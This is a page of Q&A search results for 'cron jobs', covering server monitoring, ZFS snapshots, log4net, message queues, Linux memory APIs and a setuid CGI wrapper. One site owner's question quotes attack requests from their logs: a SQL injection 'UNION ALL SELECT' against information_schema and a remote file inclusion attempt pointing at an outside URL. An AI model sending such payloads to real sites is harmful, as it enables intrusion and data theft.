Search Results

Search found 3070 results on 123 pages for 'cron jobs'.

Page 99 of 123

  • What Logs / Process Stats to monitor on a Ubuntu FTP server?

    - by Adam Salkin
    I am administering an Ubuntu Server machine running pureFTP. So far all is well, but I would like to know what I should be monitoring so that I can spot any potential stability and security issues. I'm not looking for sophisticated software, more an idea of which logs and process statistics are most useful for checking on the health of the system. I'm thinking that I can look at various parameters output from the "ps" command and compare them to see if I have things like memory leaks, but I would like to know what experienced admins do. Also, how do I do a disk check so that when I reboot, I don't get a message saying something like "disk not checked for x days, forcing check", which delays the reboot? I assume there is a command that I can run as a cron job late at night. How often should it be run? What things should I be looking at to spot intrusion attempts? The only shell access is SSH on a non-standard port through the UFW firewall, and I regularly grep auth.log for "Fail" or "Invalid". Is there anything else I should look at? I was logging the firewall (UFW), but I have very few open ports (FTP and SSH on a non-standard port), so looking at lists of IPs that have been blocked did not seem useful. Many thanks

    Read the article

  • Cannot destroy ZFS snapshot: dataset already exists

    - by Morven
    I have a server (T5220, though I doubt it matters) running Solaris 10 8/07, and I have a ZFS pool, "mysql", on internal disk. Within it I have a filesystem "mysql/data/4.1.12", which I snapshot hourly with a script from cron. I have one snapshot, created as one of those hourly snaps, that will not destroy. I have renamed it out of sequence to be "mysql/data/4.1.12@wibble" so that my script will not try and fail to destroy it, but it was originally within the sequence, though I doubt that matters. It renames successfully. The snapshot can be successfully navigated and read from through the .zfs/snapshots directory. It has no clones based on it. Trying to destroy it does this:

        (265) root@web-mysql4:/# zfs destroy mysql/data/4.1.12@wibble
        cannot destroy 'mysql/data/4.1.12@wibble': dataset already exists
        (266) root@web-mysql4:/#

    which is apparently nonsensical: of course it already exists, that's the point! Anyone seen anything like this before? Web searches show nothing obviously similar. I can provide the list of installed patches if necessary.

    Read the article

  • What are the benefits and drawbacks of using header files?

    - by vodkhang
    I have some experience with programming languages like Java, C#, and Scala, as well as lower-level languages like C, C++, and Objective-C. My observation is that lower-level languages separate header files from implementation files, while higher-level languages never make that separation; they use access modifiers like public, private, and protected to do the job of header files. One benefit of header files I have seen mentioned (in books like Code Complete) is that other people never have to look at our implementation files, which helps with encapsulation. A drawback, for me, is that it creates too many files and can feel verbose. That is just my impression, and I don't know what other benefits and drawbacks people who work with header files see. This question may not relate directly to programming, but I think understanding it would help me program to an interface and design software better.
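    As a side note, here is a minimal sketch of the split the question describes, using hypothetical file names (counter.h, counter.c, main.c). The header exposes only an opaque type and a few functions, which is the encapsulation benefit Code Complete refers to; client code compiles against the header alone.

        /* counter.h -- the public interface; this is all a caller ever sees. */
        #ifndef COUNTER_H
        #define COUNTER_H

        struct counter;                          /* opaque: layout stays hidden */
        struct counter *counter_new(void);
        void counter_increment(struct counter *c);
        int  counter_value(const struct counter *c);
        void counter_free(struct counter *c);

        #endif

        /* counter.c -- the implementation; callers never need to read this. */
        #include <stdlib.h>
        #include "counter.h"

        struct counter { int value; };           /* the hidden representation */

        struct counter *counter_new(void) {
            struct counter *c = malloc(sizeof *c);
            if (c) c->value = 0;
            return c;
        }
        void counter_increment(struct counter *c) { c->value++; }
        int  counter_value(const struct counter *c) { return c->value; }
        void counter_free(struct counter *c) { free(c); }

        /* main.c -- client code, compiled against the header only. */
        #include <stdio.h>
        #include "counter.h"

        int main(void) {
            struct counter *c = counter_new();
            counter_increment(c);
            printf("%d\n", counter_value(c));    /* prints 1 */
            counter_free(c);
            return 0;
        }

    In Java or C#, the same boundary would be expressed with a private field and public methods in a single file, which is exactly the trade-off the question is weighing.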

    Read the article

  • Why are all of my ZFS snapshot directories empty?

    - by growse
    I'm running an Oracle 11 box as a ZFS storage appliance, and I'm taking regular snapshots of the ZFS filesystems, via cron. In the past, I know that if I wanted to grab a particular file from a snapshot, a read-only copy was kept in .zfs/snapshot/{name}/ and I could just navigate there and pull the file out. This is documented on Oracle's website. However, I went to do this the other day, and noticed that the ZFS directories within the snapshot directories are all empty. zfs list -t snapshot correctly shows the list of snapshots that should be present, and .zfs/snapshots correctly contains a directory for each snapshot, and in each snapshot there is a directory present for each ZFS filesystem. However, these directories appear to be empty. I just tested a restore by touching a file in a little-used share and rolling back to the latest hourly snapshot, and this appears to have worked fine. So the rollback functionality is there. Did Oracle change how snapshots are done? Or is something seriously wrong here?

    Read the article

  • Visually documenting web server configuration and infrastructure

    - by Alex Ciarlillo
    I have just finished a large re-organization and update of our institution's web server(s). This server hosts 3 virtual hosts, 3-4 blogs, 2 wikis, some legacy static HTML pages, and many hosted documents (PDF, .jpg, .xls). I have organized the site into a structure something like:

        /var/www/sites/vhost1, vhost2, vhost3
            .../wordpress/blogX
            .../mediawiki/wikiX

    Data is in a separate directory structure so I can run a cron task over it to make sure it is all writeable and such. I then symlink to these data directories for each application:

        /var/www/data/vhost1, vhost2, vhost3
            .../wordpress/blogX/uploads
            .../mediawiki/wikiX/images

    All Apache configs are in /etc/httpd/conf.d/vhosts.d/vhost1,2,3.conf. On top of this there is also a testing server which mirrors this setup. Once changes are fully tested, they are rsynced down to the live server. All the WordPress and MediaWiki installs are straight from SVN, and updates are done by switching branches or "svn up". So my question is: how can I best document this to share with a) co-workers, b) a possible future replacement, c) myself 6 months from now? Obviously I can make a wiki page, Excel document, whatever and fill it with text, but I am looking for a more visual representation that I can use to explain the architecture to less technical people. Ideally it would be awesome if this visual representation could then be expanded to show more technical details.

    Read the article

  • Log4net rolling file appender skipping every other day in an ASP.NET MVC app

    - by tasty_spider_men
    Hi, I've set up some log4net logging on an ASP.NET MVC application I've had running for a little over a month now. I've set up rolling file (and SMTP) appenders on it. The application is hit several thousand times a day - a lot of actions are logged. On top of these, a number of batch jobs are run as part of the application that also write to the log. Now, as I've been occupied with other work, I've not attended to this application much, assuming things were working based on my test setup. Unfortunately I've discovered that the rolling file appender on my production server seems to be skipping every other day. I.e. I have logs: 10/4/2010, 10/4/2010.1, 10/4/2010.2, 12/4/2010, 12/4/2010.1, 14/4/2010, 14/4/2010.1 etc. Any idea what could be causing this? It is absolutely impossible that there has been no activity on these odd days in the lifetime of the application. Cheers

    Read the article

  • What's the difference between /123 and /?123?

    - by BoltClock
    I've noticed that some sites (including http://jobs.stackoverflow.com) have query strings that look like this: http://somewebapp.example/?123 as compared to: http://somewebapp.example/123 or http://somewebapp.example/id/123 What are the reasons that developers choose to implement their web apps' URLs using the first example instead of the second and third examples? And as a bonus, how would one implement the first example in PHP, given that 123 is the primary key of some row in a database table? (I just need to know how to retrieve 123 from the URL; I already know how to query the database for a primary key of 123.)

    Read the article

  • Solution for distributing MANY simple network tasks?

    - by EmpireJones
    I would like to create some sort of distributed setup for running a ton of small/simple REST web queries in a production environment. For every 5-10 related queries executed from a node, I will generate a very small amount of derived data, which will need to be stored in a standard relational database (such as PostgreSQL). What platforms are built for this type of problem set? The nature, data sizes, and quantities seem to contradict the mindset of Hadoop. There are also more grid-based architectures such as Condor and Sun Grid Engine, which I have seen mentioned, but I'm not sure whether these platforms have any recovery from errors (checking if a job succeeds). What I would really like is a FIFO-type queue that I could add jobs to, with the end result of my database getting updated. Any suggestions on the best tool for the job?

    Read the article

  • What's the safest way to kick off a root-level process via cgi on an Apache server?

    - by MartyMacGyver
    The problem: I have a script that runs periodically via a cron job as root, but I want to give people a way to kick it off asynchronously too, via a webpage. (The script will be written to ensure it doesn't run overlapping instances or such.) I don't need the users to log in or have an account; they simply click a button, and if the script is ready to be run, it'll run. The users may select arguments for the script (heavily filtered as inputs), but for simplicity we'll say they just have the button to press. As a simple test, I've created a Python script in cgi-bin. chown-ing it to root:root and then applying "chmod ug+" to it didn't have the desired results: it still thinks it has the effective group of the web server account... from what I can tell this isn't allowed. I read that wrapping it with a compiled CGI program would do the job, so I created a C wrapper that calls my script (its permissions restored to normal) and gave the executable root ownership and the setuid bit. That worked... the script ran as if root ran it. My main question is: is this normal (the need for the binary wrapper to get the job done), and is this a secure way to do it? It's not world-facing, but still, I'd like to learn best practices. More broadly, I often wonder why a compiled binary is more "trusted" than a script in practice. I'd think you'd trust a file that was human-readable over a cryptic binary. If an attacker can edit a file then you're already in trouble, more so if it's one you can't easily examine. In short, I'd expect it to be the other way 'round on that basis. Your thoughts?
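    For what it's worth, a minimal sketch of the kind of compiled wrapper described above, assuming a hypothetical script path (/usr/local/sbin/maintenance.sh); the binary would be owned by root with the setuid bit set (chmod 4755), and all it does is reset the environment and exec one fixed script with no caller-supplied arguments. This is a sketch of the pattern, not a hardened implementation - a real wrapper exposed through a web server needs a careful security review.

        /* wrapper.c - build with: cc -o wrapper wrapper.c
         * then: chown root:root wrapper && chmod 4755 wrapper */
        #include <stdio.h>
        #include <unistd.h>

        int main(void)
        {
            /* The setuid bit only sets the *effective* uid; promote it to
             * the real uid as well so the script runs fully as root.     */
            if (setuid(0) != 0) {
                perror("setuid");
                return 1;
            }

            /* Replace the CGI environment with a clean, fixed one. */
            char *const envp[] = { "PATH=/usr/sbin:/usr/bin:/sbin:/bin", NULL };

            /* Hypothetical script path; no arguments are passed through. */
            execle("/usr/local/sbin/maintenance.sh", "maintenance.sh",
                   (char *)NULL, envp);

            perror("execle");   /* only reached if the exec itself failed */
            return 1;
        }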

    Read the article

  • Passing an extra parameter in scheduleJob in node.js

    - by Sush
    Is there any possible way to pass an extra parameter, along with the date, in schedule.scheduleJob(date, function(id))? The below code is not working:

        var id = record.id;
        var date = record.date;
        jobsCollection.save({ id: record.id }, { $set: record }, function (err, result) {
            var j = schedule.scheduleJob(date, function (id) {
                return function () {
                    console.log("inside----------");
                    console.log(id);
                };
            }(id));
            if (!err) {
                return context.sendJson([], 404);
            }
        });

    I want to pass the date along with other data to the scheduled job, so that I can perform other operations based on the scheduled date and that id.

    Read the article

  • What is the best way to format messages for queueing?

    - by Tijmen
    I've been reading up on message queueing lately, and I'd like to implement a simple, extendable system for my app. While there's a lot of good information out there on setting up an MQ system, I can't find much about the actual implementation. I'm looking for patterns and best practices on how to properly format messages for a queue, and for ways to execute the jobs in PHP. Should I use JSON, serialized objects, text, URLs or XML? What information should I send? Is a worker with a switch($job['command']) {} (or something like that) the way to go, or are there any established patterns out there for implementing a worker? Help greatly appreciated!

    Read the article

  • ec2 spot instance for daily processing task

    - by chaft
    I don't have much experience as a sysadmin or with Amazon AWS, so I hope someone can explain in simple terms, or refer me to a good guide on how to achieve the below. I have a system running on EC2 and Amazon RDS, getting data in and saving it to the DB. I need to run a script once a day (at the end of the day) to process all that data and prepare a daily report. This process will take approximately an hour to run, and it needs to run on a high-memory instance. From what I've read so far, I guess the best way to do it is to have a high-memory spot instance run every day, set it up to execute the script on startup, and shut down when done. Is that the right way to do it? If so, how do I do it? How do I tell the spot instance to run every day - through a cron job on the other server, or is there a better way? How do I set it up to run the script on startup - through cloud-init? Any help would be appreciated. One last thing: the job is not very time-sensitive as long as it runs every day. Thanks

    Read the article

  • How to deploy new instances of the same application (on 1 server) automatically?

    - by Intru
    I'm working on a SaaS application where each customer runs its own version of the application. All the application instances currently run on a single server. This works quite well for us (we need fewer resources in total). The application doesn't use a lot of resources, so even a small VPS would be overkill (and more expensive). Adding a new customer is currently quite a bit of work:

        - Create a user that is allowed to ssh
        - Create a new MySQL database and user
        - Create a virtual host for the application
        - Log in with the new user, do a git checkout of the application (in the right location)
        - Create tables in the new database, and add some init data
        - Add some cron jobs
        - Create a first user that can log in
        - Add this new instance to Capistrano

    What would be the best way to automate these tasks? Are there applications that can (given proper configuration) do this? Ideally this should be usable by a sales person (so something web-based). I could write a (bash) script that does most of these tasks, and then maybe add a small web-based wrapper where someone could provide the domain/default user information. Of course, this would also require a delete script, since some customers will eventually leave, which means that you need a list of all existing customers/instances.

    Read the article

  • Write Local File using Adobe Air Iframe

    - by user290687
    This is driving me mad. I am creating an AIR application and everything is working great. However, I would really like to have a form inside an iframe that, when the user clicks submit, saves the file to the local application storage directory. Right now I am able to do this and save the file with no problems when I access the HTML page outside an iframe. However, if I wrap the page in an iframe and hit submit, the file does not save. Any code examples would be very much appreciated. When I am using the iframe, my code looks as follows:

        <iframe src="jobs/newjob.html" height="800px" width="800px"
                sandboxRoot="app:/" documentRoot="app:/sandbox"
                ondominitialize="setupBridge()">

    Read the article

  • Reading log files from web application

    - by Egorinsk
    Hi! I want to write a small PHP application for monitoring logs on a Debian server, including syslog logs and Apache/PHP messages. The problem here is that the Apache user (www-data) has no access to the /var/log directory. What would be the best way to grant access to the logs for the PHP application? Let's assume that the log files can be really large, like hundreds of megabytes. I have some ideas:

        - Write a shell script that would be run via sudo and tail the last 512 KB of the log into a separate file that can be read by the application - that's inefficient, because of forking a new process and having to read the data twice
        - Add www-data to the adm group (which can read logs) - that's insecure
        - Start a PHP process via cron every minute to read the logs - that's not very good, because it doesn't allow real-time monitoring; also, this script will be started even when I don't read the logs, and consume CPU time (the server is in the cloud, and I'll have to pay for it)
        - Create a hardlink to all log files with lowered permissions - I guess that won't work, because logrotate could recreate the log files and their inode numbers would change
        - Start a separate nginx/Apache server under a privileged user that may read the logs

    Does anyone have a better solution?

    Read the article

  • How to find the reason for a weekly downtime on an Ubuntu web server hosted by AWS?

    - by IceSheep
    We started monitoring our web server using Pingdom and found out that we have a downtime of a few minutes every Sunday at 0:00 UTC. The test runs every minute and checks whether a successful HTTP response (code 200) is returned on port 80. The test fails due to a timeout (no response after 30 seconds). Here's what we've already checked – without success:

        - Since we run our webserver behind a load balancer, I've set the Pingdom test on both the load balancer's public DNS and the webserver's public DNS in order to find out if there's a problem with the AWS load balancer - both tests return the same result
        - We set up Munin on our webserver. Everything looked fine even after the failure. Since the last failure lasted only 2 minutes, I suppose Munin couldn't capture a potential problem (it only checks every 5 minutes)
        - I have checked /var/log/apache2/error.log and /var/log/syslog for suspicious entries
        - I have checked /etc/cron.weekly and /etc/crontab for suspicious entries
        - I have searched for files created or last modified between 0:00 and 0:15 using this method (nothing found):

            touch -t 201209020000 start
            touch -t 201209020015 end
            find / -newer start -and ! -newer end

    Has anybody experienced a similar problem? Any proposals on how to find the reason for this behavior? It's Ubuntu 10.04 LTS running on an AWS m1.large instance. Thanks!

    Read the article

  • Why is "start in" needed for Windows scheduled tasks?

    - by GomoX
    We develop a web application that can be deployed on Windows or Linux. The Linux implementation uses cron, and the Windows one uses scheduled tasks to run a single PHP script that processes all scheduled tasks for our system. The task is scheduled using schtasks during the install process. This has always worked both under W2003 and W2008. A week ago a customer reported that scheduled tasks were not running. He is running Windows 2008. We checked over and over and finally solved the issue by entering the folder that contains the .vbs script as the "start in" folder for the scheduled task. That said, there is no way to set the "start in..." value from schtasks without using an XML definition of the task. XML definitions don't work in Windows 2003, so I would have to add Windows version detection to the installer, additional testing, etc. (I'd like to avoid this if at all possible). The only atypical thing I noticed about the install is that the system is installed in D:\ as opposed to the default C:\Program Files (x86)\, but I don't see how this would matter. All the paths are absolute in all the scripts. Can anyone suggest a reasonable solution for this?

    Read the article

  • Cause for MySQL crash

    - by user1322092
    A cron job automatically restarted my MySQL database. What was the cause of the crash, and can you suggest how to resolve or monitor it? I would REALLY appreciate your input.

        120715 14:38:58 mysqld started
        120715 14:38:58 InnoDB: Started; log sequence number 0 411137570
        120715 14:38:58 [Note] /usr/libexec/mysqld: ready for connections.
        Version: '5.0.95' socket: '/var/lib/mysql/mysql.sock' port: 3306 Source distribution
        120715 15:14:21 [Note] /usr/libexec/mysqld: Normal shutdown
        120715 15:14:23 InnoDB: Starting shutdown...
        120715 15:14:25 InnoDB: Shutdown completed; log sequence number 0 411166467
        120715 15:14:25 [Note] /usr/libexec/mysqld: Shutdown complete
        120715 08:14:25 mysqld ended
        120715 08:14:26 mysqld started
        120715 8:14:26 InnoDB: Started; log sequence number 0 411166467
        120715 8:14:26 [Note] /usr/libexec/mysqld: ready for connections.
        Version: '5.0.95' socket: '/var/lib/mysql/mysql.sock' port: 3306 Source distribution
        121212 09:15:32 mysqld started
        InnoDB: The log sequence number in ibdata files does not match
        InnoDB: the log sequence number in the ib_logfiles!
        121212 9:15:58 InnoDB: Database was not shut down normally!
        InnoDB: Starting crash recovery.
        InnoDB: Reading tablespace information from the .ibd files...
        InnoDB: Restoring possible half-written data pages from the doublewrite
        InnoDB: buffer...
        121212 9:17:28 InnoDB: Started; log sequence number 0 554145193
        121212 9:17:57 [Note] /usr/libexec/mysqld: ready for connections.
        Version: '5.0.95' socket: '/var/lib/mysql/mysql.sock' port: 3306 Source distribution

    Read the article

  • How to efficiently implement a blocking call with Rails, while letting the client wait for the reply

    - by Kyle Heironimus
    We have a web service written in Rails. The API is published and we cannot change it. Our app communicates with a remote web service that sometimes hangs or takes several seconds to reply:

        Client -> Our Web Service -> Remote Web Service

    Currently, if the remote web service hangs for 5 seconds, one of our Rails processes on our web service also hangs with it, which is what we need to avoid. I've seen things such as mod-x-sendfile, modporter, and delayed jobs, but as best I can tell, they all assume the client is not waiting for an answer. Since the API is already established, we cannot tell the client "I'm attempting to do what you want, check back later for the answer." The best option we have come up with so far is to add a second, non-Rails web server running EventMachine to process these particular calls. Is there a better way?

    Read the article

  • Use of MouseListeners in a JTable

    - by eli1987
    I have a JTable with columns 'Job_no' and 'Status' with values such as:

        Job_no   Status
        1        Active
        2        Pending
        3        Pending

    I would like it so that if a user clicks on a Status - say, in this case, the first 'Pending' (where Job_no = 2) - an input dialog pops up allowing the user to change the status of the cell clicked. How can I do this? Bear in mind you will also have to retrieve the Job_no (that corresponds to that status) somehow, and that, though I'm OK with JOptionPanes, I'm new to JTables. I'm using JDBC (MySQL) and have a table 'Jobs' which, amongst other things, has columns Job_no and Status. Thanks for your help.

    Read the article

  • Is this an injection attempt or a normal request?

    - by CheeseConQueso
    In cPanel's Analog Stats statistics module, I've noticed countless requests to connect to the following example:

        /?x=19&y=15

    The numbers are random, but it's always setting x and y variables. Another category of mysterious requests:

        /?id=http://nic.bupt.edu.cn/media/j1.txt??

    There are other attempted injections in the request log that have straight SQL written into them as well. Example:

        /jobs/jobinfo.php?id=-999.9 UNION ALL SELECT 1,(SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM information_schema.tables WHERE table_schema=0x73636363726F6F745F7075626C6963),3,4,5,6,7,8,9,10,11,12,13--

    It looks like they are all reaching a 404, but I'm still wondering about the intent behind these. I know this is vague, but maybe someone knows whether this is normal when using cPanel & phpMyAdmin services. Also, there was a search box installed on the site, which could be the reason. Any suggestions as to what all these are?

    Read the article

  • C/C++ memory usage API in Linux/Windows

    - by minjang
    I'd like to obtain memory usage information, both per process and system-wide. In Windows, it's pretty easy: GetProcessMemoryInfo and GlobalMemoryStatusEx do these jobs well and very easily. For example, GetProcessMemoryInfo gives the "PeakWorkingSetSize" of the given process, and GlobalMemoryStatusEx returns the system-wide available memory. However, I need to do it on Linux. I'm trying to find Linux system APIs that are equivalent to GetProcessMemoryInfo and GlobalMemoryStatusEx. I found getrusage, but the maximum resident set size field, ru_maxrss, in struct rusage is just zero - it's not implemented. Also, I have no idea how to get system-wide free memory. As a current workaround, I'm using system("ps -p %my_pid -o vsz,rsz") and manually logging to a file, but it's dirty and not convenient for processing the data. I'd like to know some fancy Linux APIs for this purpose.
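    For reference, a minimal sketch (not a definitive answer) of the closest plain-C equivalents on Linux: getrusage(RUSAGE_SELF, ...) reports the peak resident set size in kilobytes on reasonably recent kernels, and sysinfo() gives system-wide totals. On older kernels ru_maxrss can indeed read as zero, in which case parsing VmPeak/VmHWM from /proc/self/status is the usual fallback.

        #include <stdio.h>
        #include <sys/resource.h>   /* getrusage */
        #include <sys/sysinfo.h>    /* sysinfo   */

        int main(void)
        {
            /* Per-process: peak resident set size, roughly PeakWorkingSetSize. */
            struct rusage ru;
            if (getrusage(RUSAGE_SELF, &ru) == 0)
                printf("peak RSS: %ld kB\n", ru.ru_maxrss);   /* kilobytes on Linux */

            /* System-wide: roughly GlobalMemoryStatusEx. */
            struct sysinfo si;
            if (sysinfo(&si) == 0) {
                unsigned long long unit = si.mem_unit;
                printf("total RAM: %llu MB, free RAM: %llu MB\n",
                       (si.totalram * unit) >> 20, (si.freeram * unit) >> 20);
            }
            return 0;
        }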

    Read the article

  • What do I need to do now that I want to take my programming hobby to the next level?

    - by hohog
    I've always wanted to make games, but I did not start actively learning programming on my own until my first year of university. I kept going throughout university, learning new languages and showing off things I had made, while neglecting my major in Biology. Anyway, I've ended up with an Economics degree and a portfolio of SaaS and web apps I created so I could eat during my final year. So far, I'm getting a few interviews here and there for web programming positions. When I get a logic pre-test, I fail miserably, or the job requires a comp sci degree. I mean, I can easily design and code an entire app, which I emphasize through my portfolio... but I don't know why I am so slow at logic puzzles in pre-screening interviews. So what should I do now? Get certificates in languages? Go back to school and learn CS? Is it too late to get into Windows programming jobs rather than web programming?

    Read the article

  • Windows batch/script code to conditionally process based on date value in text file

    - by CarolinaJay65
    I am using Windows XP. The code can be used in a batch file or a VBS script; I intend to use the Windows scheduler to run the program. I need code to read a date from a text file (it could be the only line in the text file, or the date could be included in the filename - I control the process that generates the file). The code would then need to evaluate the text file date against the current date to confirm that the text file date is from the prior month. I'm starting to build a process to be able to run 1st-of-the-month jobs once the monthly data has been refreshed. I'm new to building this kind of process using batch/script files. Thanks for your time.

    Read the article

  • SQL Server (TSQL) - Is it possible to EXEC statements in parallel?

    - by Investor5555
    SQL Server 2008 R2. Here is a simplified example:

        EXECUTE sp_executesql N'PRINT ''1st '' + convert(varchar, getdate(), 126)
            WAITFOR DELAY ''000:00:10'''
        EXECUTE sp_executesql N'PRINT ''2nd '' + convert(varchar, getdate(), 126)'

    The first statement will print the date and delay 10 seconds before proceeding. The second statement should print immediately. The way T-SQL works, the 2nd statement won't be evaluated until the first completes. If I copy and paste it to a new query window, it will execute immediately. The issue is that I have other, more complex things going on, with variables that need to be passed to both procedures. What I am trying to do is:

        - Get a record
        - Lock it for a period of time
        - While it is locked, execute some other statements against this record and the table itself

    Perhaps there is a way to dynamically create a couple of jobs? Anyway, I am looking for a simple way to do this without having to manually PRINT statements and copy/paste to another session. Is there a way to EXEC without wait / in parallel?

    Read the article
